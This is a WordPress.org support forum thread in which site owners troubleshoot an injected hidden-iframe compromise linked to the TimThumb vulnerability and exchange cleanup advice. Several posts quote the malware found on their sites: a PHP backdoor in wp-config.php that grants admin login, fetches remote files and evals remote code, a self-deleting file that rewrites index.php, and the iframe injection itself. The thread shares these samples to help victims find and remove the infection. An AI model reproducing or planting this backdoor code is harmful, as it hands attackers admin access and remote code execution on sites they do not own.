WordPress.org

Ready to get started?Download WordPress

Forums

[closed] [TimThumb Vulnerability] iframe hack (60 posts)

  1. secretja
    Member
    Posted 3 years ago #

    Hi,

    have somebody more info about

    <iframe id="iframe" style="width: 1px; height: 1px;" src=" http://counter-wordpress.com/frame.php">
    <html>
    <head>
    </head>
    <body>
    </body>
    </html>
    </iframe>

    Somebody hacked all my WP sites...

    THX to all who will help.

  2. milescatlett
    Member
    Posted 3 years ago #

    I am hosted on Bluehost.com. I was speaking to a customer service rep today. He said he noticed this appearing in an iframe on a non-Wordpress site. I have this on some of my sites also. I would appreciate any information anyone has.

    Thanks

    Miles

  3. secretja
    Member
    Posted 3 years ago #

    I ha have re upload all wp sites and now is all ok. One one non wp site I notice the same thing but I did the same like and wit wp sites.

    Good luck Miles.

  4. ToucanCreative
    Member
    Posted 3 years ago #

    I just got this exact iframe hack on my wordpress site. I have scoured many many files, run antivirus/malware checks on the whole site without any success. I am hosted with VentraIP.com.au. This seems like a new hack given OP posted 2 hours ago. I noticed this just yesterday.

  5. Spirit_of_Martin
    Member
    Posted 3 years ago #

    Look in config.php

    delete code:

    if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
    if ($_GET['pass'] == ''){
    if ($_GET['pingnow']== 'login'){
    $user_login = 'admin';
    $user = get_userdatabylogin($user_login);
    $user_id = $user->ID;
    wp_set_current_user($user_id, $user_login);
    wp_set_auth_cookie($user_id);
    do_action('wp_login', $user_login);
    }
    if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
    $ch = curl_init($_GET['file']);
    $fnm = md5(rand(0,100)).'.php';
    $fp = fopen($fnm, "w");
    curl_setopt($ch, CURLOPT_FILE, $fp);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_exec($ch);
    curl_close($ch);
    fclose($fp);
    echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
    }
    if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
    $ch = curl_init($_GET['file']);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    $re = curl_exec($ch);
    curl_close($ch);
    eval($re);
    }}}

    There is somwhere else, still looking. I don't know how they hack the site...

    Regards!

  6. ToucanCreative
    Member
    Posted 3 years ago #

    I also re-uploaded my WP files, and everything seems to be in order again - for now at least!

  7. baluba
    Member
    Posted 3 years ago #

    Interesting, seeing the same iframe code in some of my Joomla sites too.

  8. milescatlett
    Member
    Posted 3 years ago #

    I'm not sure what it does, but I have had sites that have been redirecting to other locations (sometimes sleezy, music playing, etc...).

    But I have also been upgrading timthumb so those things could be related to that.

    @secretja, What do you mean by reupload? Are you installing a fresh theme, or exporting the content of an old site and creating a new wordpress site? I'm afraid to download the whole database for fear it might have malicious code in it...

    Thanks for all your help....

  9. secretja
    Member
    Posted 3 years ago #

    Hi,

    it is not in theme files... somewhere else it is. I downloaded fresh wp and I have upload/upgrade all wp sites. Now is OK.

  10. Elmo_is_evil
    Member
    Posted 3 years ago #

    Got this as well after being affected by PHPRemoteView via timthumb ....

    Now PHPRemoteView is gone, timthumb is up to date, but after removing it yesterday (In my case a JS), it came back this morning ...

    Mine was embedded in a JS, \wp-includes\js\l10n.js yesterday, and this morning \wp-includes\js\l10n.js and \wp-includes\js\jquery\jquery.js .... The code is obfuscated ....

    I already mention it on a PHPRemoteView topic ....

    http://wordpress.org/support/topic/two-strange-errors?replies=22#post-2289404

  11. Once you've removed TimThumb, you STILL need to perform the usual steps.

    1) Change ALL YOUR PASSWORD
    2) Scan ALL your files (esp .htaccess) for anything hinky.

    Best would be to delete and re-upload everything fresh, and then change every single password, from WP to FTP and SQL.

  12. Elmo_is_evil
    Member
    Posted 3 years ago #

    Damn sometime i'm a tool, i just forgot to upload the clean wp-config.php ....

    Anyway, still looking to be sure ....

    Spirit_of_Martin, my php is a little bit rusty, but, basically, this bit of php, gave the attacker the cookie of the admin, in the first condition, the second look like some kind of scanner/patcher, and the third a file downloader ....

    My guess is that there's a tool on top of it (On another server or computer) ....

  13. Devin Walker
    Member
    Posted 3 years ago #

    The same thing happened to us today on our site. We've been getting hit with attacks all seemingly coming from the timthumb vulnerability. We have updated timthumb but this keeps happening. I'm guessing there's a missing back door somewhere.

    What's really concerning to me is that my site's database password has been commented out and changed. I'm wondering if there's anything wrong with my database now...

  14. secretja
    Member
    Posted 3 years ago #

    I got it again. Damn.

  15. Then you're not cleaning it up right.

    Best way at this point would be to do this:
    1) backup EVERYTHING to your PC. Files and DB.

    2) DELETE the files on your server. Yeah. Don't worry, your posts are on your database, we're leaving that alone.

    3) Change your passwords fro SSH/FTP and SQL

    4) On your PC, review the following files:
    .htaccess
    wp-config.php

    They look okay? Good. Copy them back up to your server (remember to edit your wp-config.php with your new SQL password).

    5) Get FRESH and CLEAN downloads of WordPress, all your themes and plugins

    6) As soon as you get in, change your passwords.

  16. milescatlett
    Member
    Posted 3 years ago #

    This may be a dumb question, but I can see counter-wordpress loading on my site. However, when I right click on the page to view source or try to view it in firebug, I can't find an iframe or "counter" in the source code. Where is it, so I can know if it's gone?

  17. Check at http://sitecheck.sucuri.net/scanner/ It should tell you

  18. milescatlett
    Member
    Posted 3 years ago #

    Thank you so much!

  19. milescatlett
    Member
    Posted 3 years ago #

    Just found this on one of my sites. It looks bad. Anything special I should do? It was in the wp-config file:

    if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
    if ($_GET['pass'] == 'ea5d2f1c4608232e07d3aa3d998e5135'){
    if ($_GET['pingnow']== 'login'){
    $user_login = 'admin';
    $user = get_userdatabylogin($user_login);
    $user_id = $user->ID;
    wp_set_current_user($user_id, $user_login);
    wp_set_auth_cookie($user_id);
    do_action('wp_login', $user_login);
    }
    if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
    $ch = curl_init($_GET['file']);
    $fnm = md5(rand(0,100)).'.php';
    $fp = fopen($fnm, "w");
    curl_setopt($ch, CURLOPT_FILE, $fp);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_exec($ch);
    curl_close($ch);
    fclose($fp);
    echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
    }
    if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
    $ch = curl_init($_GET['file']);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    $re = curl_exec($ch);
    curl_close($ch);
    eval($re);
    }}}
  20. Same advice as before.

    http://wordpress.org/support/topic/iframe-hack-3?replies=18#post-2290168

    You need to rip that code out, ALL of it, change your passwords and clean your site.

  21. milescatlett
    Member
    Posted 3 years ago #

    Ipstenu, you are a HUGE help. Thanks so much!

  22. secretja
    Member
    Posted 3 years ago #

    Hi,

    I hope that I get ride of that s...

    1 step - install fresh wp and template
    2 change all passwords

    check
    wp-config

    and after that I have found next:
    /wp-content/upd.php

    <?php
    $file = __FILE__;
    $pos = strpos($file,'wp-content');
    $dir = substr($file,0,$pos);
    $index = file_get_contents($dir.'index.php');
    $index = str_replace('superpuperdomain.com','superpuperdomain2.com',$index);
    $f = fopen($dir.'index.php',"w");
    fputs($f,$index);
    fclose($f);
    unlink($file);
    ?>

    and
    /wp-content/2b64c2f19d868305aa8bbc2d72902cc5.php

    because of that you need to check wp-content
    Delete those files.

    For now is all OK.

    Good luck guys... ;)

  23. Spirit_of_Martin
    Member
    Posted 3 years ago #

    Look for old jquery.js in your template - delete old or upgrade, looks that sometimes there is also something with this iframe hack.

  24. 1 step - install fresh wp and template

    Instead, DELETE WP and then upload. It's the only way to scrub out ALL the files. Then you only have to manually check .htaccess and wp-config.php (and if you've uploaded any non-images I suppose....)

    Delete it all EXCEPT for:
    wp-config.php
    .htaccess
    /wp-content/uploads

    And even then you have to scan those two files AND look for any .php files in /wp-content/uploads/

    I wish it was easier :(

  25. Elmo_is_evil
    Member
    Posted 3 years ago #

    This may be a dumb question, but I can see counter-wordpress loading on my site. However, when I right click on the page to view source or try to view it in firebug, I can't find an iframe or "counter" in the source code. Where is it, so I can know if it's gone?

    Because it's loaded by a JS file... Clever way to hide this kind of thing ....

    My Wp installation is ok now, i didn't delete and reinstall, but i basically did a byte by byte comparison, of the file (with one of my backup, and the file from 3.2.1).

    But anyway, in my case, the goal was to analyses what they did ....

    The best way to be secure, is obviously to delete and reinstall ....

    (Sorry for my English this morning, still no coffee in the system ...)

  26. Jorge
    Member
    Posted 3 years ago #

    I wish it was easier :(

    Me too, I have been battling this iframe for the past week. I deleted the entire WP install and reinstalled.

    First I found the iframe in the theme and after the reinstall, it's in the wp-admin area...not good.

    I'm thinking the injection might be in the DB because how else can it contaminate my installation AND not be purged when I deleted all the files?

    I'm going to have to do a complete reinstallation with a new DB and see how it goes.

  27. Devin Walker
    Member
    Posted 3 years ago #

    @Jorge,

    Was your db changed in wp-config.php? Because ours was and I since have changed the password on it and removed the iframe and been monitoring the site to see if it's coming back. I'm really hoping the database hasn't been affected. Let me know what you find.

  28. Did you delete the files AND change your password AND scan your wp-config.php and .htaccess for possible violations?

    Did you remove EVERYTHING in wp-content (except for the /uploads/ folder)?

    Did you change all your passwords?

  29. Jorge
    Member
    Posted 3 years ago #

    Did you delete the files AND change your password AND scan your wp-config.php and .htaccess for possible violations?

    Did you remove EVERYTHING in wp-content (except for the /uploads/ folder)?

    Did you change all your passwords?

    Yes, just finished another install with a fresh database.

    Went to the wp-admin area, and nothing. I went to the Manage Themes page and bam, it's there.

    I'm using Chrome - I right click and click on "Inspect Element" - the iframe is there.

    iframe id="iframe" style="width: 1px; height: 1px; " src="http://counter-wordpress.com/frame.php" /iframe

    View source shows nothing but that's a given. This is driving me bonkers.

    EDIT: If the malicious script was in the DB, it would not have been an issue because like I said, it was a fresh install with a new DB with different passwords, etc.

  30. Jorge - Call your webhost ASAFP and tell them this, because it looks like your server's compromised.

Topic Closed

This topic has been closed to new replies.

About this Topic